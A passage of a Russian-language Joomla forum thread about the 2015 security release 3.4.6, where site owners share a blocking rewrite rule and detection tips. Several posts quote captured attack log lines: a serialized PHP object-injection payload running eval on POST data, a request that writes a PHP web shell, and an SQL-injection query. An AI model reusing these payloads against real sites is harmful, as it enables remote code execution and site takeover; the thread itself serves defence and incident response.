Новый релиз безопасности Joomla! 3.4.6 - страница 2 - Joomla 3.x: Установка, обновление и настройка

при обновлении 3х сайтов на хостинге nic c Joomla! 3.4.5 до Joomla! 3.4.6 белая страница.
откатился назад.
на других хостингах норма.

Вчера выпустили хотфиксы

Блокирование атаки средствами Apache для тех, кто не может (или не хочет) обновиться:

Код

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} JDatabaseDriverMysqli? [NC]
RewriteRule .? - [F]

Мдаа... 10 лет...

И что это даёт? можно подробнее? )

@b2z
да
Последние четыре года все дырки, это ощущение что это были специально реализованные бэкдоры, просто сейчас их массово находят сторонние, и их закрывают.
И что нас еще ждет, тогда?

И что это даёт? можно подробнее? )

Запрос редиректит в другой.

есть запрет доступа.

рекомендуется поискать в логах “JDatabaseDriverMysqli” или “O:” в User Agent, проверив, не был ли уже применен эксплоит

77.247.181.162 - - [15/Dec/2015:19:14:19 +0300] "GET / HTTP/1.0" 200 12440 "http://***.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

я так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?

нашел в логах вот этоя так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
новый релиз поставил

Проверять файловую систему на наличие сторонних или измененных файлов (могли загрузить шелл) и базу данных на добавленных администраторов.

Сайты на https кто-нибудь обновлял?
Мне сегодня человек написал, что после обновления слетели все стили
Я посмотреть не успел, он его уже откатил ...

нашел в логах вот это

Код

77.247.181.162 - - [15/Dec/2015:19:14:19 +0300] "GET / HTTP/1.0" 200 12440 "http://***.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

я так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
новый релиз поставил

"GET //?1=ZnB1dHMoZm9wZW4oInNpdGVtYS5waHAiLCJ3IiksJzw/cGhwIGV2YWwoJF9QT1NUWzFdKTs/PicpO3BocGluZm8oKTs= HTTP/1.0"
***
GET //?1=fputs(fopen("sitema.php","w"),'<?php eval($_POST[1]);?>');phpinfo();
 

"GET /index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=1&type_id=1&list%5Bselect%5D=(select%201%20from%20(select%20count(*),concat((select%200x6275677363616E776B),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.0"

анализ логов некоторых моих сайтов показал атаки с IP

89.234.157.254 - - [15/Dec/2015:18:57:01 +0300]
77.247.181.165 - - [15/Dec/2015:18:50:46 +0300]
173.14.173.227 - - [15/Dec/2015:19:37:34 +0300]
171.25.193.131 - - [15/Dec/2015:19:30:08 +0300]

Чего за паника, какая верхушка?

Если кто видит у себя в логах

Код

JDatabaseDriverMysqli

или

Код

O:

это означает что вас уже взломали!

Чего за паника, какая верхушка? Так можно сказать о любом движке. Да, сложилось так, что у Joomla нашли подряд несколько, но до этого очень долго ничего не находили.

https://www.cvedetails.com/vendor/3496/Joomla.html
https://www.cvedetails.com/vendor/2337/Wordpress.html
https://www.cvedetails.com/vendor/1367/Drupal.html

Уязвимы все версии Joomla. Стоит.

Вам не просто файлы почистить теперь надо, вам надо просканировать весь сайт на предмет стороннего кода.

Важно! Если кто видит у себя в логах

Код

JDatabaseDriverMysqli

или

Код

O:

это означает что вас уже взломали!
Искать требуется Вам теперь сторонний код на сайте, полностью сканировать и чистить, если хостинг и несколько сайтов то на всех соседних которые не разграничены по правам и пользователям.

Если в логах это я вижу по времени после обновления, это значит "взломали" или "пытались взломать"?
Несколько сайтов на J1.5 (разные клиенты старые). Стоит ли их озадачивать этой новой работой (проверка сайта)? Есть данные?